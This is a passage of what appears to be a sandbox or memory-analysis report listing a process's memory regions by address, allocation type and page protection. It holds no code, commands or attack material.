|
page execute read
|
||
90C2000
|
unkown
|
page read and write
|
||
630E000
|
trusted library allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
D040000
|
heap
|
page read and write
|
||
B9B4000
|
heap
|
page read and write
|
||
3050000
|
heap
|
page read and write
|
||
DB6D000
|
heap
|
page read and write
|
||
328A000
|
heap
|
page read and write
|
||
CA10000
|
heap
|
page read and write
|
||
CB9C000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B82000
|
heap
|
page read and write
|
||
B937000
|
heap
|
page read and write
|
||
FBA000
|
heap
|
page read and write
|
||
940B000
|
unkown
|
page readonly
|
||
1007000
|
heap
|
page read and write
|
||
DE42000
|
heap
|
page read and write
|
||
DA22000
|
heap
|
page read and write
|
||
6252000
|
trusted library allocation
|
page read and write
|
||
884000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
DE01000
|
heap
|
page read and write
|
||
4AC000
|
unkown
|
page execute read
|
||
2B51000
|
heap
|
page read and write
|
||
D082000
|
heap
|
page read and write
|
||
919C000
|
unkown
|
page read and write
|
||
CE30000
|
heap
|
page read and write
|
||
6470000
|
trusted library allocation
|
page execute
|
||
29E2000
|
direct allocation
|
page read and write
|
||
837000
|
heap
|
page read and write
|
||
C252000
|
heap
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
C2D6000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
C77A000
|
heap
|
page read and write
|
||
CAE6000
|
trusted library allocation
|
page read and write
|
||
FAF000
|
stack
|
page read and write
|
||
D250000
|
heap
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
A512000
|
direct allocation
|
page read and write
|
||
43D0000
|
direct allocation
|
page execute and read and write
|
||
DDBE000
|
heap
|
page read and write
|
||
93EE000
|
unkown
|
page readonly
|
||
2B51000
|
heap
|
page read and write
|
||
B71E000
|
stack
|
page read and write
|
||
909F000
|
unkown
|
page read and write
|
||
2B33000
|
heap
|
page read and write
|
||
327F000
|
heap
|
page read and write
|
||
6198000
|
heap
|
page read and write
|
||
33BF000
|
stack
|
page read and write
|
||
31E3000
|
heap
|
page read and write
|
||
91A7000
|
unkown
|
page write copy
|
||
94CD000
|
unkown
|
page readonly
|
||
9444000
|
unkown
|
page readonly
|
||
2A50000
|
heap
|
page read and write
|
||
3350000
|
heap
|
page read and write
|
||
947F000
|
unkown
|
page readonly
|
||
C042000
|
heap
|
page read and write
|
||
AFD000
|
unkown
|
page read and write
|
||
3166000
|
heap
|
page read and write
|
||
6143000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5F09000
|
heap
|
page read and write
|
||
C420000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
94CA000
|
unkown
|
page readonly
|
||
271F000
|
heap
|
page read and write
|
||
9452000
|
unkown
|
page readonly
|
||
E221000
|
heap
|
page read and write
|
||
A50B000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
61C8000
|
heap
|
page read and write
|
||
5F07000
|
heap
|
page read and write
|
||
884000
|
heap
|
page read and write
|
||
CE00000
|
remote allocation
|
page read and write
|
||
6305000
|
trusted library allocation
|
page read and write
|
||
29DB000
|
direct allocation
|
page read and write
|
||
28FC000
|
stack
|
page read and write
|
||
D250000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
D736000
|
heap
|
page read and write
|
||
29FF000
|
direct allocation
|
page read and write
|
||
BA6000
|
heap
|
page read and write
|
||
1067000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
617B000
|
heap
|
page read and write
|
||
DCD2000
|
direct allocation
|
page read and write
|
||
CCA4000
|
heap
|
page read and write
|
||
336A000
|
heap
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
C5AC000
|
heap
|
page read and write
|
||
44C0000
|
heap
|
page read and write
|
||
55DC000
|
unkown
|
page execute and read and write
|
||
A125000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
FFF000
|
heap
|
page read and write
|
||
2B44000
|
heap
|
page read and write
|
||
3005000
|
heap
|
page read and write
|
||
3005000
|
heap
|
page read and write
|
||
55A0000
|
heap
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
D5EC000
|
heap
|
page read and write
|
||
327D000
|
heap
|
page read and write
|
||
D040000
|
heap
|
page read and write
|
||
616B000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CEF6000
|
heap
|
page read and write
|
||
28DE000
|
stack
|
page read and write
|
||
25D0000
|
heap
|
page read and write
|
||
2A5C000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
103E000
|
heap
|
page read and write
|
||
2AA6000
|
heap
|
page read and write
|
||
94E3000
|
unkown
|
page readonly
|
||
A0AE000
|
direct allocation
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
29BD000
|
direct allocation
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
2B5C000
|
heap
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
94A8000
|
unkown
|
page readonly
|
||
D526000
|
heap
|
page read and write
|
||
62F0000
|
trusted library allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
1050000
|
heap
|
page read and write
|
||
6F6B000
|
unkown
|
page execute read
|
||
CB06000
|
trusted library allocation
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
270C000
|
heap
|
page read and write
|
||
32D4000
|
heap
|
page read and write
|
||
D855000
|
heap
|
page read and write
|
||
5EE8000
|
heap
|
page read and write
|
||
9566000
|
unkown
|
page readonly
|
||
DF08000
|
heap
|
page read and write
|
||
2999000
|
direct allocation
|
page read and write
|
||
9700000
|
trusted library allocation
|
page read and write
|
||
2950000
|
direct allocation
|
page read and write
|
||
B973000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5EE2000
|
heap
|
page read and write
|
||
BA4000
|
heap
|
page read and write
|
||
B901000
|
heap
|
page read and write
|
||
CE72000
|
heap
|
page read and write
|
||
29CC000
|
direct allocation
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
2733000
|
heap
|
page read and write
|
||
305D000
|
stack
|
page read and write
|
||
CAF9000
|
trusted library allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
D3DC000
|
heap
|
page read and write
|
||
CEB4000
|
heap
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
D0A0000
|
heap
|
page read and write
|
||
92EF000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
FBE000
|
heap
|
page read and write
|
||
862000
|
heap
|
page read and write
|
||
A117000
|
direct allocation
|
page read and write
|
||
B3BC000
|
stack
|
page read and write
|
||
E328000
|
heap
|
page read and write
|
||
3350000
|
heap
|
page read and write
|
||
3370000
|
heap
|
page read and write
|
||
6F8F5000
|
unkown
|
page readonly
|
||
1060000
|
heap
|
page read and write
|
||
D99E000
|
heap
|
page read and write
|
||
5F0B000
|
heap
|
page read and write
|
||
A090000
|
direct allocation
|
page read and write
|
||
6301000
|
trusted library allocation
|
page read and write
|
||
9051000
|
unkown
|
page execute read
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5560000
|
direct allocation
|
page execute and read and write
|
||
2B51000
|
heap
|
page read and write
|
||
C084000
|
heap
|
page read and write
|
||
67BF000
|
heap
|
page read and write
|
||
AE41000
|
direct allocation
|
page read and write
|
||
5F07000
|
heap
|
page read and write
|
||
CA9E000
|
stack
|
page read and write
|
||
105C000
|
heap
|
page read and write
|
||
908C000
|
unkown
|
page write copy
|
||
61CE000
|
heap
|
page read and write
|
||
2BFE000
|
stack
|
page read and write
|
||
2B83000
|
heap
|
page read and write
|
||
A0B5000
|
direct allocation
|
page read and write
|
||
916E000
|
unkown
|
page read and write
|
||
662D000
|
unkown
|
page execute read
|
||
BF9C000
|
heap
|
page read and write
|
||
62FC000
|
trusted library allocation
|
page read and write
|
||
DB6C000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
32EC000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
32D4000
|
heap
|
page read and write
|
||
CCEF000
|
heap
|
page read and write
|
||
DAA6000
|
heap
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
6198000
|
heap
|
page read and write
|
||
A3FE000
|
direct allocation
|
page read and write
|
||
DC32000
|
heap
|
page read and write
|
||
325F000
|
heap
|
page read and write
|
||
49C4000
|
heap
|
page read and write
|
||
31E3000
|
heap
|
page read and write
|
||
9483000
|
unkown
|
page readonly
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
9519000
|
unkown
|
page readonly
|
||
DBF0000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
342F000
|
stack
|
page read and write
|
||
61B7000
|
heap
|
page read and write
|
||
CA3C000
|
direct allocation
|
page read and write
|
||
61F5000
|
heap
|
page read and write
|
||
1043000
|
heap
|
page read and write
|
||
CF38000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
945E000
|
unkown
|
page readonly
|
||
94F2000
|
unkown
|
page readonly
|
||
2B51000
|
heap
|
page read and write
|
||
2A20000
|
heap
|
page read and write
|
||
2B42000
|
heap
|
page read and write
|
||
BE94000
|
heap
|
page read and write
|
||
315D000
|
stack
|
page read and write
|
||
3356000
|
heap
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2F40000
|
heap
|
page read and write
|
||
3362000
|
heap
|
page read and write
|
||
CE00000
|
remote allocation
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
E0D6000
|
heap
|
page read and write
|
||
9448000
|
unkown
|
page readonly
|
||
CB5B000
|
heap
|
page read and write
|
||
362F000
|
stack
|
page read and write
|
||
A172000
|
direct allocation
|
page read and write
|
||
5F0B000
|
heap
|
page read and write
|
||
5EC5000
|
heap
|
page read and write
|
||
74FB000
|
unkown
|
page execute read
|
||
2B51000
|
heap
|
page read and write
|
||
4B4F000
|
stack
|
page read and write
|
||
C5EE000
|
heap
|
page read and write
|
||
FDF000
|
heap
|
page read and write
|
||
62F8000
|
trusted library allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2FF5000
|
heap
|
page read and write
|
||
B23A000
|
trusted library allocation
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
BC80000
|
heap
|
page read and write
|
||
1043000
|
heap
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
E011000
|
heap
|
page read and write
|
||
DF4A000
|
heap
|
page read and write
|
||
6176000
|
heap
|
page read and write
|
||
DBAE000
|
heap
|
page read and write
|
||
CC26000
|
heap
|
page read and write
|
||
553F000
|
stack
|
page read and write
|
||
1251F000
|
heap
|
page read and write
|
||
2AA1000
|
heap
|
page read and write
|
||
CDEE000
|
heap
|
page read and write
|
||
C420000
|
heap
|
page read and write
|
||
2FDC000
|
heap
|
page read and write
|
||
C56A000
|
heap
|
page read and write
|
||
103E000
|
heap
|
page read and write
|
||
CC1F000
|
stack
|
page read and write
|
||
68BD000
|
heap
|
page read and write
|
||
414000
|
unkown
|
page execute read
|
||
6258000
|
trusted library allocation
|
page read and write
|
||
CAF9000
|
trusted library allocation
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
FB0000
|
heap
|
page read and write
|
||
6180000
|
heap
|
page read and write
|
||
5F07000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5EA0000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
BC01000
|
heap
|
page read and write
|
||
CB18000
|
heap
|
page read and write
|
||
D20E000
|
heap
|
page read and write
|
||
619B000
|
heap
|
page read and write
|
||
C18C000
|
heap
|
page read and write
|
||
3273000
|
heap
|
page read and write
|
||
2FD9000
|
heap
|
page read and write
|
||
AE4D000
|
direct allocation
|
page read and write
|
||
913C000
|
unkown
|
page read and write
|
||
104F000
|
heap
|
page read and write
|
||
5F09000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
D812000
|
heap
|
page read and write
|
||
2F0E000
|
stack
|
page read and write
|
||
6255000
|
trusted library allocation
|
page read and write
|
||
29E9000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
12559000
|
heap
|
page read and write
|
||
A11E000
|
direct allocation
|
page read and write
|
||
305E000
|
stack
|
page read and write
|
||
49B0000
|
heap
|
page read and write
|
||
5EA0000
|
heap
|
page read and write
|
||
31E4000
|
heap
|
page read and write
|
||
6F902000
|
unkown
|
page readonly
|
||
100D000
|
heap
|
page read and write
|
||
313F000
|
stack
|
page read and write
|
||
D95D000
|
heap
|
page read and write
|
||
CCE4000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5F07000
|
heap
|
page read and write
|
||
5C3C000
|
stack
|
page read and write
|
||
2ABD000
|
heap
|
page read and write
|
||
29C4000
|
direct allocation
|
page read and write
|
||
4A4E000
|
stack
|
page read and write
|
||
DCB6000
|
heap
|
page read and write
|
||
61CE000
|
heap
|
page read and write
|
||
94FA000
|
unkown
|
page readonly
|
||
919B000
|
unkown
|
page write copy
|
||
2F50000
|
remote allocation
|
page read and write
|
||
BF18000
|
heap
|
page read and write
|
||
291D000
|
direct allocation
|
page read and write
|
||
2FF5000
|
heap
|
page read and write
|
||
AB3000
|
unkown
|
page read and write
|
||
55B1000
|
unkown
|
page execute read
|
||
9541000
|
unkown
|
page readonly
|
||
CE6000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
D896000
|
heap
|
page read and write
|
||
33FF000
|
heap
|
page read and write
|
||
CC62000
|
heap
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
2F4F000
|
stack
|
page read and write
|
||
61E9000
|
heap
|
page read and write
|
||
CA94000
|
heap
|
page read and write
|
||
6194000
|
heap
|
page read and write
|
||
3169000
|
heap
|
page read and write
|
||
75DD000
|
unkown
|
page execute read
|
||
2B51000
|
heap
|
page read and write
|
||
61FB000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
A4F0000
|
heap
|
page read and write
|
||
D5ED000
|
heap
|
page read and write
|
||
6251000
|
trusted library allocation
|
page read and write
|
||
315C000
|
stack
|
page read and write
|
||
EAE000
|
stack
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
1061000
|
heap
|
page read and write
|
||
CD6B000
|
heap
|
page read and write
|
||
E0D6000
|
heap
|
page read and write
|
||
2992000
|
direct allocation
|
page read and write
|
||
42C000
|
unkown
|
page execute read
|
||
4F4D000
|
stack
|
page read and write
|
||
1DD000
|
stack
|
page read and write
|
||
2FC7000
|
heap
|
page read and write
|
||
9713000
|
trusted library allocation
|
page read and write
|
||
A47E000
|
direct allocation
|
page read and write
|
||
304C000
|
heap
|
page read and write
|
||
91AA000
|
unkown
|
page readonly
|
||
29A0000
|
direct allocation
|
page read and write
|
||
944B000
|
unkown
|
page readonly
|
||
CFBC000
|
heap
|
page read and write
|
||
2D9E000
|
stack
|
page read and write
|
||
87E000
|
heap
|
page read and write
|
||
32D3000
|
heap
|
page read and write
|
||
B050000
|
trusted library allocation
|
page read and write
|
||
DF8C000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2390000
|
heap
|
page read and write
|
||
DA64000
|
heap
|
page read and write
|
||
6185000
|
heap
|
page read and write
|
||
C0C6000
|
heap
|
page read and write
|
||
6245000
|
trusted library allocation
|
page read and write
|
||
D3DC000
|
heap
|
page read and write
|
||
2957000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
65C0000
|
heap
|
page read and write
|
||
31B0000
|
heap
|
page read and write
|
||
35B0000
|
heap
|
page read and write
|
||
D95C000
|
heap
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
6946000
|
unkown
|
page execute read
|
||
C1CE000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
619A000
|
heap
|
page read and write
|
||
32BF000
|
stack
|
page read and write
|
||
1065000
|
heap
|
page read and write
|
||
BAC6000
|
heap
|
page read and write
|
||
5BFF000
|
stack
|
page read and write
|
||
2CF3000
|
heap
|
page read and write
|
||
C042000
|
heap
|
page read and write
|
||
26BD000
|
stack
|
page read and write
|
||
61B3000
|
heap
|
page read and write
|
||
332F000
|
unkown
|
page read and write
|
||
2D8D000
|
stack
|
page read and write
|
||
251D000
|
stack
|
page read and write
|
||
6180000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
E329000
|
heap
|
page read and write
|
||
CB08000
|
trusted library allocation
|
page read and write
|
||
2B84000
|
heap
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
295E000
|
direct allocation
|
page read and write
|
||
C801000
|
heap
|
page read and write
|
||
D39B000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
1253D000
|
heap
|
page read and write
|
||
32F5000
|
heap
|
page read and write
|
||
942E000
|
unkown
|
page readonly
|
||
D0C4000
|
heap
|
page read and write
|
||
E19D000
|
heap
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
61E9000
|
heap
|
page read and write
|
||
E2E6000
|
heap
|
page read and write
|
||
CB9C000
|
heap
|
page read and write
|
||
29AF000
|
direct allocation
|
page read and write
|
||
2940000
|
direct allocation
|
page read and write
|
||
907D000
|
unkown
|
page read and write
|
||
6258000
|
trusted library allocation
|
page read and write
|
||
3273000
|
heap
|
page read and write
|
||
31E3000
|
heap
|
page read and write
|
||
D250000
|
heap
|
page read and write
|
||
BD08000
|
heap
|
page read and write
|
||
2D6D000
|
stack
|
page read and write
|
||
C294000
|
heap
|
page read and write
|
||
C108000
|
heap
|
page read and write
|
||
32BE000
|
stack
|
page read and write
|
||
A15B000
|
direct allocation
|
page read and write
|
||
5EA2000
|
heap
|
page read and write
|
||
61A5000
|
heap
|
page read and write
|
||
7EE000
|
heap
|
page read and write
|
||
1061000
|
heap
|
page read and write
|
||
BB4A000
|
heap
|
page read and write
|
||
4CB0000
|
heap
|
page read and write
|
||
3210000
|
heap
|
page read and write
|
||
C908000
|
heap
|
page read and write
|
||
9520000
|
unkown
|
page readonly
|
||
1052000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
3279000
|
heap
|
page read and write
|
||
5E9C000
|
heap
|
page read and write
|
||
DAE8000
|
heap
|
page read and write
|
||
D91A000
|
heap
|
page read and write
|
||
D6F5000
|
heap
|
page read and write
|
||
9418000
|
unkown
|
page readonly
|
||
DAA6000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
232D000
|
stack
|
page read and write
|
||
BAF000
|
heap
|
page read and write
|
||
6246000
|
trusted library allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CAF9000
|
trusted library allocation
|
page read and write
|
||
7D8000
|
heap
|
page read and write
|
||
30E3000
|
heap
|
page read and write
|
||
6F8D1000
|
unkown
|
page execute read
|
||
4C9F000
|
stack
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
A575000
|
direct allocation
|
page read and write
|
||
E3FF000
|
heap
|
page read and write
|
||
3362000
|
heap
|
page read and write
|
||
CB08000
|
trusted library allocation
|
page read and write
|
||
C98C000
|
heap
|
page read and write
|
||
B1C000
|
unkown
|
page read and write
|
||
948C000
|
unkown
|
page readonly
|
||
5F09000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
1048000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5FF0000
|
remote allocation
|
page read and write
|
||
341A000
|
heap
|
page read and write
|
||
6307000
|
trusted library allocation
|
page read and write
|
||
93D9000
|
unkown
|
page readonly
|
||
A0BC000
|
direct allocation
|
page read and write
|
||
D5AA000
|
heap
|
page read and write
|
||
BD8C000
|
heap
|
page read and write
|
||
C6F7000
|
heap
|
page read and write
|
||
1043000
|
heap
|
page read and write
|
||
C842000
|
heap
|
page read and write
|
||
C6F6000
|
heap
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
CC3A000
|
heap
|
page read and write
|
||
E36A000
|
heap
|
page read and write
|
||
33BE000
|
unkown
|
page read and write
|
||
624C000
|
trusted library allocation
|
page read and write
|
||
2F7E000
|
unkown
|
page read and write
|
||
304C000
|
heap
|
page read and write
|
||
314F000
|
heap
|
page read and write
|
||
93E5000
|
unkown
|
page readonly
|
||
907E000
|
unkown
|
page write copy
|
||
D5AA000
|
heap
|
page read and write
|
||
30C0000
|
heap
|
page read and write
|
||
3403000
|
heap
|
page read and write
|
||
907F000
|
unkown
|
page read and write
|
||
A485000
|
direct allocation
|
page read and write
|
||
93DC000
|
unkown
|
page readonly
|
||
D91A000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
3414000
|
heap
|
page read and write
|
||
2F0F000
|
stack
|
page read and write
|
||
A320000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
3362000
|
heap
|
page read and write
|
||
615D000
|
heap
|
page read and write
|
||
31E3000
|
heap
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
CFBC000
|
heap
|
page read and write
|
||
948A000
|
unkown
|
page readonly
|
||
105C000
|
heap
|
page read and write
|
||
B37D000
|
stack
|
page read and write
|
||
D3DC000
|
heap
|
page read and write
|
||
62FB000
|
trusted library allocation
|
page read and write
|
||
2800000
|
heap
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
DCB6000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
9479000
|
unkown
|
page readonly
|
||
2B51000
|
heap
|
page read and write
|
||
E15A000
|
heap
|
page read and write
|
||
9455000
|
unkown
|
page readonly
|
||
A1D0000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
A10F000
|
direct allocation
|
page read and write
|
||
DD3A000
|
heap
|
page read and write
|
||
89C000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
C908000
|
heap
|
page read and write
|
||
30E3000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CC4A000
|
heap
|
page read and write
|
||
AEC000
|
unkown
|
page write copy
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
352F000
|
unkown
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
BA0000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
76CA000
|
unkown
|
page execute read
|
||
2FDA000
|
heap
|
page read and write
|
||
CA94000
|
heap
|
page read and write
|
||
DE00000
|
heap
|
page read and write
|
||
A482000
|
direct allocation
|
page read and write
|
||
2A84000
|
heap
|
page read and write
|
||
ABC000
|
unkown
|
page read and write
|
||
25AD000
|
stack
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
2A8A000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6256000
|
trusted library allocation
|
page read and write
|
||
103E000
|
heap
|
page read and write
|
||
D460000
|
heap
|
page read and write
|
||
C6B4000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6198000
|
heap
|
page read and write
|
||
1080000
|
heap
|
page read and write
|
||
6AB9000
|
heap
|
page read and write
|
||
6309000
|
trusted library allocation
|
page read and write
|
||
DC74000
|
heap
|
page read and write
|
||
2F50000
|
remote allocation
|
page read and write
|
||
3292000
|
heap
|
page read and write
|
||
C462000
|
heap
|
page read and write
|
||
A101000
|
direct allocation
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
B120000
|
trusted library allocation
|
page read and write
|
||
C4E6000
|
heap
|
page read and write
|
||
32D3000
|
heap
|
page read and write
|
||
CB08000
|
trusted library allocation
|
page read and write
|
||
89C000
|
heap
|
page read and write
|
||
881000
|
heap
|
page read and write
|
||
BCC6000
|
heap
|
page read and write
|
||
614E000
|
heap
|
page read and write
|
||
DFCE000
|
heap
|
page read and write
|
||
2B82000
|
heap
|
page read and write
|
||
62FD000
|
trusted library allocation
|
page read and write
|
||
A136000
|
direct allocation
|
page read and write
|
||
2B82000
|
heap
|
page read and write
|
||
4E4E000
|
stack
|
page read and write
|
||
CA3E000
|
direct allocation
|
page read and write
|
||
1042000
|
heap
|
page read and write
|
||
3450000
|
heap
|
page read and write
|
||
750000
|
trusted library allocation
|
page read and write
|
||
93C1000
|
unkown
|
page readonly
|
||
62F6000
|
trusted library allocation
|
page read and write
|
||
6155000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
9487000
|
unkown
|
page readonly
|
||
3363000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CC20000
|
heap
|
page read and write
|
||
94C3000
|
unkown
|
page readonly
|
||
A4FC000
|
direct allocation
|
page read and write
|
||
C884000
|
heap
|
page read and write
|
||
941F000
|
unkown
|
page readonly
|
||
C98C000
|
heap
|
page read and write
|
||
300A000
|
heap
|
page read and write
|
||
D292000
|
heap
|
page read and write
|
||
3362000
|
heap
|
page read and write
|
||
1320D000
|
stack
|
page read and write
|
||
3033000
|
heap
|
page read and write
|
||
CF7A000
|
heap
|
page read and write
|
||
2E5D000
|
stack
|
page read and write
|
||
941B000
|
unkown
|
page readonly
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
5EDB000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
32BF000
|
heap
|
page read and write
|
||
31E3000
|
heap
|
page read and write
|
||
6185000
|
heap
|
page read and write
|
||
CAA0000
|
direct allocation
|
page execute and read and write
|
||
2B51000
|
heap
|
page read and write
|
||
29B0000
|
heap
|
page read and write
|
||
3275000
|
heap
|
page read and write
|
||
A144000
|
direct allocation
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
D6B2000
|
heap
|
page read and write
|
||
AE10000
|
direct allocation
|
page read and write
|
||
D99E000
|
heap
|
page read and write
|
||
3220000
|
heap
|
page read and write
|
||
D1CC000
|
heap
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
E262000
|
heap
|
page read and write
|
||
BED6000
|
heap
|
page read and write
|
||
304F000
|
unkown
|
page read and write
|
||
3406000
|
heap
|
page read and write
|
||
D0C4000
|
heap
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
61AF000
|
heap
|
page read and write
|
||
61F5000
|
heap
|
page read and write
|
||
94D9000
|
unkown
|
page readonly
|
||
BA01000
|
heap
|
page read and write
|
||
3413000
|
heap
|
page read and write
|
||
5F07000
|
heap
|
page read and write
|
||
C884000
|
heap
|
page read and write
|
||
1065000
|
heap
|
page read and write
|
||
6741000
|
heap
|
page read and write
|
||
E052000
|
heap
|
page read and write
|
||
4E0C000
|
stack
|
page read and write
|
||
9706000
|
trusted library allocation
|
page read and write
|
||
2A84000
|
heap
|
page read and write
|
||
C5AC000
|
heap
|
page read and write
|
||
31E3000
|
heap
|
page read and write
|
||
31D6000
|
heap
|
page read and write
|
||
69BB000
|
heap
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
5F09000
|
heap
|
page read and write
|
||
31D3000
|
heap
|
page read and write
|
||
30AA000
|
heap
|
page read and write
|
||
D106000
|
heap
|
page read and write
|
||
947C000
|
unkown
|
page readonly
|
||
6157000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
1020000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
A487000
|
direct allocation
|
page read and write
|
||
D20F000
|
heap
|
page read and write
|
||
297B000
|
direct allocation
|
page read and write
|
||
32DC000
|
heap
|
page read and write
|
||
9199000
|
unkown
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6243000
|
trusted library allocation
|
page read and write
|
||
B9B5000
|
heap
|
page read and write
|
||
C295000
|
heap
|
page read and write
|
||
6304000
|
trusted library allocation
|
page read and write
|
||
E052000
|
heap
|
page read and write
|
||
449F000
|
stack
|
page read and write
|
||
CB1E000
|
stack
|
page read and write
|
||
3277000
|
heap
|
page read and write
|
||
970A000
|
trusted library allocation
|
page read and write
|
||
32D4000
|
heap
|
page read and write
|
||
3414000
|
heap
|
page read and write
|
||
328E000
|
stack
|
page read and write
|
||
2F4E000
|
stack
|
page read and write
|
||
61C8000
|
heap
|
page read and write
|
||
D4E5000
|
heap
|
page read and write
|
||
DF8D000
|
heap
|
page read and write
|
||
55B0000
|
unkown
|
page readonly
|
||
D4E4000
|
heap
|
page read and write
|
||
3414000
|
heap
|
page read and write
|
||
BB8C000
|
heap
|
page read and write
|
||
6F8F9000
|
unkown
|
page read and write
|
||
DF4A000
|
heap
|
page read and write
|
||
3292000
|
heap
|
page read and write
|
||
BF18000
|
heap
|
page read and write
|
||
630D000
|
trusted library allocation
|
page read and write
|
||
3353000
|
heap
|
page read and write
|
||
E1DE000
|
heap
|
page read and write
|
||
6245000
|
trusted library allocation
|
page read and write
|
||
2A84000
|
heap
|
page read and write
|
||
B69C000
|
stack
|
page read and write
|
||
3363000
|
heap
|
